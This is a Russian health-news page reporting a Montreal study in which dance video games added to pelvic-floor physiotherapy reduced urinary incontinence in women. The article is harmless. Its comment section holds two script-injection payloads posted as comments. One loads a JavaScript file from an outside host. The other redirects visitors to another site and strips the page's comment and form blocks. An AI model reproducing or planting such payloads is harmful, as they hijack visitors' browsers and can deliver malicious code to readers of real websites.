Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Зачем танцевать? Чтобы не...  >>  Зачем танцевать? Чтобы не описаться!
 
Обратная связь
 

Зачем танцевать? Чтобы не описаться!

Размер шрифта
14 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Чем лечить недержание мочи? Виртуальная реальность, танцы и веселье – это явно не первое, что приходит в голову. Однако именно эти методы показали свою эффективность!

Зачем танцевать? Чтобы не описаться!

В ходе данного исследования ученые добавили танцевальные упражнения на игровой консоли в обязательный курс физиотерапии при слабости мышц тазового дна. В результате у всех пациентов (24 человека) значительно снизилось подтекание мочи, чего не наблюдалось при обычном курсе упражнений. Кроме того, никто из участников не захотел покинуть исследование, зато наблюдался наплыв новых желающих.

Приверженность пациентов к лечению – ключ к успешной терапии. Чем больше больные желают тренироваться, тем быстрее они укрепляют мышцы тазового дна. Ученые объясняют, что их целью в данном исследовании была мотивация женщин на посещение занятий каждую неделю. Они быстро поняли, что больше всего участницам нравится танцевальная часть занятий, из-за которой никто не хотел «прогуливать» уроки. Нельзя исключать и социальный аспект – женщины много шутили и смеялись во время занятий.

Сами танцы значительно улучшили ситуацию с недержанием мочи у пациенток. Во время занятий дама приходилось быстро двигать ногами, чтобы успевать за девушкой на экране, и одновременно сосредотачиваться на удержании мочи. В результате пациентки стали чувствовать себя более уверенно, так как они научились держать мышцы тазового дна в напряжении при выполнении любой повседневной работы.

Это первый опыт использования игровых приставок при лечении недержания мочи.

Как быть здоровой женщиной? Все в нашем спецпроекте «Женское здоровье».

Данная статья опубликована на основании материалов, предоставленных Университетом Монреаля. Результаты исследования были опубликованы в журнале «Неврология и уродинамика» в 2014 году.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как сандалии мешают вам жить   Хотите испортить кому-то настроение – заставьте посмотреть на солнце!   Как научиться терпеть   Все что надо знать о бронхите  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как не описаться?! Мифы о мочевом пузыре!
Что можно и нельзя при болях в колене
Как не описаться

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.